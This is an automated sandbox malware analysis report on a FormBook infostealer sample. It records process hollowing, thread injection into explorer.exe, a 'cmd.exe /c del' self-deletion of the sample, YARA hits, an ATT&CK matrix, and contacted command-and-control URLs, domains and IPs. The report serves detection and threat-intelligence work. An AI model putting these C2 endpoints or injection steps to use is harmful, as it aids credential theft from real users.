          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0467AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0467AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045EA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045EA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0466FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045BE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0466FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04688ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046346A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04680EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04680EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04680EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0464FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04688F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045CEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045CFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045DF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045EA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045EA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0468070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0468070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045EE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0464FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0464FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C8794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Section loaded: unknown target: C:\Users\user\Desktop\PQMW0W5h3X.exe protection: execute and read and write
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Thread register set: target process: 3440
Source: C:\Windows\SysWOW64\rundll32.exe | Thread register set: target process: 3440
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 140000
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Process created: C:\Users\user\Desktop\PQMW0W5h3X.exe 'C:\Users\user\Desktop\PQMW0W5h3X.exe'
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PQMW0W5h3X.exe'
Source: explorer.exe, 00000003.00000000.364488507.0000000000EE0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.337208045.00000000008B8000.00000004.00000020.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.364488507.0000000000EE0000.00000002.00000001.sdmp | Binary or memory string: &Program Manager
Source: explorer.exe, 00000003.00000000.364488507.0000000000EE0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.594178697.0000000004250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000001.331749144.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.382158559.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.334729011.00000000022C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.381684238.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.PQMW0W5h3X.exe.22c0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PQMW0W5h3X.exe.22c0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook (the same memory-dump and unpacked-PE Yara matches as listed under Stealing of Sensitive Information above)

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Native API 1 | Path Interception | Process Injection 512 | Virtualization/Sandbox Evasion 3 | Input Capture 1 | Security Software Discovery 131 | Remote Services | Input Capture 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
Default Accounts | Shared Modules 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection 512 | LSASS Memory | Virtualization/Sandbox Evasion 3 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information 1 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Clipboard Data 1 | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 3 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 12 | SIM Card Swap | Carrier Billing Fraud | -
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Rundll32 1 | LSA Secrets | File and Directory Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | -
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing 11 | Cached Domain Credentials | System Information Discovery 13 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | -

(The digits after a technique name are the report's signature counts for that cell, kept as they appear in the matrix.)

Behavior Graph

Behavior Graph ID: 438543 | Sample: PQMW0W5h3X.exe | Start date: 22/06/2021 | Architecture: WINDOWS | Score: 100

Sample-level nodes: www.wideawakemomma.com; wideawakemomma.com. Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 7 other signatures.

Process tree recovered from the graph, with dropped files, contacted hosts and signatures attached to the process they belong to:

• PQMW0W5h3X.exe 19 (started)
  • dropped: C:\Users\user\AppData\Local\...\System.dll (PE32); C:\Users\user\AppData\...\axjnwhbrvqsxuek (DOS)
  • signatures: Detected unpacking (changes PE section rights); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
  • PQMW0W5h3X.exe (started)
    • signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
• explorer.exe (started)
  • contacted: doityourselfism.com 169.62.77.158, 49761, 80 SOFTLAYERUS United States; www.ivoirepneus.com 213.186.33.5, 49758, 80 OVHFR France; 17 other IPs or domains
  • signatures: System process connects to network (likely due to code injection or exploit)
  • rundll32.exe (started)
    • signatures: Tries to detect virtualization through RDTSC time measurements
    • cmd.exe 1 (started)
      • conhost.exe (started)

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
PQMW0W5h3X.exe | 17% | Virustotal | -
PQMW0W5h3X.exe | 22% | ReversingLabs | -
PQMW0W5h3X.exe | 100% | Joe Sandbox ML | -

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nsgB979.tmp\System.dll | 0% | Metadefender | -
C:\Users\user\AppData\Local\Temp\nsgB979.tmp\System.dll | 0% | ReversingLabs | -

Unpacked PE Files

Source | Detection | Scanner | Label
2.0.PQMW0W5h3X.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
0.2.PQMW0W5h3X.exe.22c0000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
4.2.rundll32.exe.4d4be0.2.unpack | 100% | Avira | TR/Patched.Ren.Gen
0.0.PQMW0W5h3X.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
2.1.PQMW0W5h3X.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
4.2.rundll32.exe.4ac7960.5.unpack | 100% | Avira | TR/Patched.Ren.Gen
0.2.PQMW0W5h3X.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
2.2.PQMW0W5h3X.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

Domains

Source | Detection | Scanner | Label
www.guys-only.com | 0% | Virustotal | -

          URLs


          Domains and IPs

          Contacted Domains


Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.builtbydawn.com/dy8g/?A4Ll=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUHJ1zZD6cROGeNm54w==&6l-=6lY0 | true | Avira URL Cloud: safe | unknown
http://www.doityourselfism.com/dy8g/?A4Ll=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&6l-=6lY0 | true | Avira URL Cloud: safe | unknown
http://www.invisiongc.net/dy8g/?6l-=6lY0&A4Ll=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZraksguVxeKRya9uu2A== | false | Avira URL Cloud: safe | unknown
http://www.killrstudio.com/dy8g/?A4Ll=cuaraJgkoEfCri9CHpn14TbyfEdnqeu3xvSLUqjD8bR4lpFRWk9obMnQWFhWIe7eI+ID23wHyg==&6l-=6lY0 | false | Avira URL Cloud: safe | unknown
http://www.thenorthgoldline.com/dy8g/?6l-=6lY0&A4Ll=ECrCAtcV2n6MmfvkEdEbFHcY5Y6SYRzoX56/iPQe4p5qRx/lRHZ+fK1TxUIBKPcHvB2GVYbV9w== | true | Avira URL Cloud: safe | unknown
http://www.wideawakemomma.com/dy8g/?6l-=6lY0&A4Ll=n9TsU/XZirCaXaeSUYbcU/ldcwtyxBDUqcAV1OuBRveQ+2sj4hTKAs/tsBBJXfdNhkQaXcLrpw== | false | Avira URL Cloud: safe | unknown
www.extinctionbrews.com/dy8g/ | true | Avira URL Cloud: safe | low
http://www.ivoirepneus.com/dy8g/?6l-=6lY0&A4Ll=txuHOH5mmlRIAzfI6nqq0ViggBeEQnMt8DQXoVThNh6+jXgye1aguJwAyFZ9eO3q4TbjPHrHlw== | true | Avira URL Cloud: safe | unknown
http://www.cindywillardrealtor.com/dy8g/?6l-=6lY0&A4Ll=d70oYrFBgMb8Os9vLLnU0lHHdKTBSZLAimar8DFO2VzVjiqJdJvZleKp8o1L2qAF92htTMNNUg== | false | Avira URL Cloud: safe | unknown
http://www.guys-only.com/dy8g/?A4Ll=xnzbbPmlZmYZGqrTQxh0SyAvVYBEHJsgluOUHMC+sqx7GSIQl98agFOAtXHHwP8thCN3RkXuRg==&6l-=6lY0 | true | Avira URL Cloud: safe | unknown
http://www.extinctionbrews.com/dy8g/?A4Ll=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGP3cSH4hj9/IphBwA==&6l-=6lY0 | false | Avira URL Cloud: safe | unknown
http://www.qq66520.com/dy8g/?6l-=6lY0&A4Ll=rxSGsMlf+TpCm2paceR4OA9vkYPhboYZiWSl1OoSBIXvvwNRDuCI148weh0JxST9QqctWF9UAQ== | true | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.autoitscript.com/autoit3/J | explorer.exe, 00000003.00000000.337441844.000000000095C000.00000004.00000020.sdmp | false | - | high
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.com | explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.com/designersG | explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.com/designers/? | explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | false | - | high
https://zz.bdstatic.com/linksubmit/push.js | rundll32.exe, 00000004.00000002.595657754.0000000004C42000.00000004.00000001.sdmp | false | - | high
http://www.tiro.com | explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://nsis.sf.net/NSIS_ErrorError | PQMW0W5h3X.exe | false | - | high
http://push.zhanzhang.baidu.com/push.js | rundll32.exe, 00000004.00000002.595657754.0000000004C42000.00000004.00000001.sdmp | false | - | high
http://www.goodfont.co.kr | explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.carterandcone.coml | explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.sajatypeworks.com | explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.typography.netD | explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://fontfabrik.com | explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.founder.com.cn/cn | explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.fontbureau.com/designers/frere-jones.html | explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://nsis.sf.net/NSIS_Error | PQMW0W5h3X.exe | false | - | high
http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.fontbureau.com/designers8 | explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.fonts.com | explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.sandoll.co.kr | explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.urwpp.deDPlease | explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.zhongyicts.com.cn | explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.sakkal.com | explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
213.186.33.5 | www.ivoirepneus.com | France | 16276 | OVHFR | true
172.67.129.33 | www.builtbydawn.com | United States | 13335 | CLOUDFLARENETUS | true
166.88.88.176 | www.qq66520.com | United States | 18779 | EGIHOSTINGUS | true
154.196.232.108 | www.guys-only.com | Seychelles | 139646 | HKMTC-AS-APHONGKONGMegalayerTechnologyCoLimitedHK | true
169.62.77.158 | doityourselfism.com | United States | 36351 | SOFTLAYERUS | true
34.102.136.180 | extinctionbrews.com | United States | 15169 | GOOGLEUS | false
75.2.81.221 | 825610.parkingcrew.net | United States | 16509 | AMAZON-02US | false
52.79.124.173 | www.mzyxi-rkah-y.net | United States | 16509 | AMAZON-02US | true

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 438543
Start date: 22.06.2021
Start time: 18:23:16
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 43s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: PQMW0W5h3X.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 24
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/3@14/8
EGA Information: Failed
HDC Information:
• Successful, ratio: 23.6% (good quality ratio 21.4%)
• Quality average: 75.4%
• Quality standard deviation: 31.2%
HCA Information:
• Successful, ratio: 90%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 168.61.161.212, 104.43.193.48, 13.88.21.125, 13.64.90.137, 20.50.102.62, 20.54.104.15, 20.54.7.98, 51.103.5.159, 40.112.88.60, 173.222.108.210, 173.222.108.226, 80.67.82.235, 80.67.82.211, 20.82.210.154, 23.35.236.56
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, wns.notify.trafficmanager.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dscg3.akamai.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information

Simulations

Behavior and APIs

No simulations

                                                                                Joe Sandbox View / Context

                                                                                IPs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                213.186.33.5RFQ-BCM 03122020.exeGet hashmaliciousBrowse
                                                                                • www.prltoday.com/uqf5/?9rTd=F/Xh9v+g7Cdwl5upkcpMZ8e4b+3WpLzzeVKIM3R3duzbf3evtWksiEg580fE4Vra9h2o&aVz=WBZ8
                                                                                20210622-kll98374.exeGet hashmaliciousBrowse
                                                                                • www.impresafree24.com/nmda/?RP2h-fQ=IdLvG/bKy9PiMBchWzdVhP2W3XlWgHjHBI4V2wYIVZfP5YHWbmtjQK3eIV/cIXUoTbKn&5jo=7neT66GHcVrh
                                                                                New_PO#98202139.xllGet hashmaliciousBrowse
                                                                                • www.guniverse.net/wlns/?_8=obmV34E8IgJL0y0kI7hyDBOk8azyZSyy8uvUE6L1y0VpxoEYjAH5t6/TlTHDCRXI3f38&xDK=UZYPUlDPt4SDBZ8P
                                                                                kdhfue77324.exeGet hashmaliciousBrowse
                                                                                • www.poacolors.com/ngvm/?DT-D=8TcJTBzsK+HhuKYXehH9492pDxzGvvxdxfrG/qrl9m6Ckg/etRlY8SCi3gshhWGBB0c4&1bZXAr=h454ixkXP29
                                                                                FedEx doc 17062021.exeGet hashmaliciousBrowse
                                                                                • www.tcaproduct.ovh/ssh4/?2d34=SDKxiPv&h0DHzD=Rl/zsYIsdXtBwt3twxu2LuJTC0qMvDm4Mc/hvN4nDKVlMCw1vgexk8V+cx4orVYgW6Zi
                                                                                DocumentCopy_pdf.exeGet hashmaliciousBrowse
                                                                                • www.impresafree24.com/nmda/?V6y8=IdLvG/bKy9PiMBchWzdVhP2W3XlWgHjHBI4V2wYIVZfP5YHWbmtjQK3eIWTMUmITUuj2ckrA9g==&cT=4huTdrP0
                                                                                kkaH2ZEdQ1.exeGet hashmaliciousBrowse
                                                                                • www.lp-groupe.info/ybn/?-ZdTr=wOGr+F25RoP9WPNpsFGFxRGNLhzZTK4kudDetDHrkCGTjpx6UWpWoSIk1czumSYA4+qY&oRm8=s8YlDbK80xIp
                                                                                Shipping Doc578.exeGet hashmaliciousBrowse
                                                                                • www.geraldineprofit.com/ajsp/?hL0=mX3FC0rWOmZLwh4qbfvKXGX9RdF3hnuYXE+OWqE17ZQMzXMEP9+qCOq0VR7aaEzUGOwrMvYUag==&Dxl0dz=0txXARu8O6
                                                                                Reference No. # 3200025006.exeGet hashmaliciousBrowse
                                                                                • www.thetravelingplant.com/ntfs/?F48L2tc=r6KcxW+QOqJy23YP7pEknY9griH0XGsR7HWvbkIiP6j3PsQ8V0Yr7GW48LtU7Huq9clfVnYY1w==&2dWDG=6lX42hr8TrzLRjc
                                                                                Purchase_Order.exeGet hashmaliciousBrowse
